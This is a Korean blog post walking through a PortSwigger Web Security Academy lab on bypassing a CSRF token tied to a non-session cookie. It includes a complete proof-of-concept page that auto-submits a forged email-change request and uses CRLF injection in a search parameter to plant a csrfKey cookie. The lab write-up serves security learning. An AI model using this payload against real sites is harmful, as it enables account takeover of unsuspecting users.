본문 바로가기
정보보안/웹해킹

[PortSwigger] CSRF where token is tied to non-session cookie

by meanjung 2021. 10. 17.

https://portswigger.net/web-security/csrf/lab-token-tied-to-non-session-cookie

 

Lab: CSRF where token is tied to non-session cookie | Web Security Academy

This lab's email change functionality is vulnerable to CSRF. It uses tokens to try to prevent CSRF attacks, but they aren't fully integrated into the site's ...

portswigger.net

 

이렇게 csrfKey, csrf, session이 전송된다.

 

하나씩 값을 바꿔 리피터로 보내보면 csrfKey와 csrf는 연관성이 있는 것 같고, session은 그냥 로그인에만 관여하는 것 같다.

 

w/p로 로그인한 상태에서 c/m로 로그인하면 주어지는 csrfKey와 csrf를 갖고와서 PoC코드를 만들어주면 된다. 

<html>
    <body>
        <form method='POST' action="https://ac721f6e1eb27ccec03d099200c80041.web-security-academy.net/my-account/change-email">
            <input type="hidden" name="email" value="attacker&#64;attacker&#46;net"/>
            <input type="hidden" name="csrf" value="V59evoPqmNwfZQn422GxXGukaIA0Wmss"/>
            <input type="submit" value="submit">
        </form>
        <img src="https://ac721f6e1eb27ccec03d099200c80041.web-security-academy.net/?search=HACKER%0d%0aSet-Cookie:%20csrfKey=CXHTmYcvg8KNWzKSpEUgxxpmUcHjCjD3" onerror="document.forms[0].submit()">
    </body>
</html>

쿠키를 url에 넣어버리는 저 모습... 잘 이해가 가지 않는다

'정보보안 > 웹해킹' 카테고리의 다른 글

[PortSwigger] Reflected XSS into HTML context with all tags blocked except custom ones  (0) 2021.10.18
[PortSwigger] Reflected XSS into HTML context with most tags and attributes blocked  (0) 2021.10.18
[PortSwigger] CSRF where token is not tied to user session  (0) 2021.10.16
[PortSwigger] CSRF where token validation depends on token being present  (0) 2021.10.16
[PostSwigger] CSRF where token validation depends on request method  (0) 2021.10.16

관련글

댓글

티스토리툴바